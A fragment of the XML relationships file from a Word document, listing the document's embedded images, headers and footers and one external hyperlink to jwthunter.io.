Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jwthunter.io/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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9.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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cxxvFSuRGJ9+62pNQbWGYKxd2w==">CgMxLjAyDmguNzR5anZkNW5nN2lqMg5oLjM0eDB2czZnaWt6MzIOaC43bGlnNzBuc3kwNTgyDmguejRiYzN1aGJ2eXY5OAByITFJaWpISXQ4WnhKOUk5bkxmMlo4RERUeWxHRlhacjJBZQ==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